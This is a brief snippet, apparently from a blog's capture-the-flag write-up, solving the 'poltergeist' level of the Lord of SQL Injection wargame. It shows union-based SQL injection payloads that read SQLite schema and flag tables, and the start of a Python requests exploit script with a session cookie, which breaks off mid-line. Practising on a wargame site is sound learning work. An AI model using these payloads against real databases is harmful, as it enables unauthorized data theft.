Wargame/Lord of SQL Injection
[Lord of SQL Injection] poltergeist
Prob Payload pw=' union select sql from sqlite_master limit 1,1--%20 pw=' union select flag_0876285c from flag_70c81d99--%20 Exploit import requests from bs4 import BeautifulSoup url = "https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?" cookie = {'PHPSESSID':'o8k4eis6nm0q904ajkf4t2aiva'} def tbl_name_and_col_name(): query = "pw=' union select sql from sqlite_master li..
2022. 10. 25.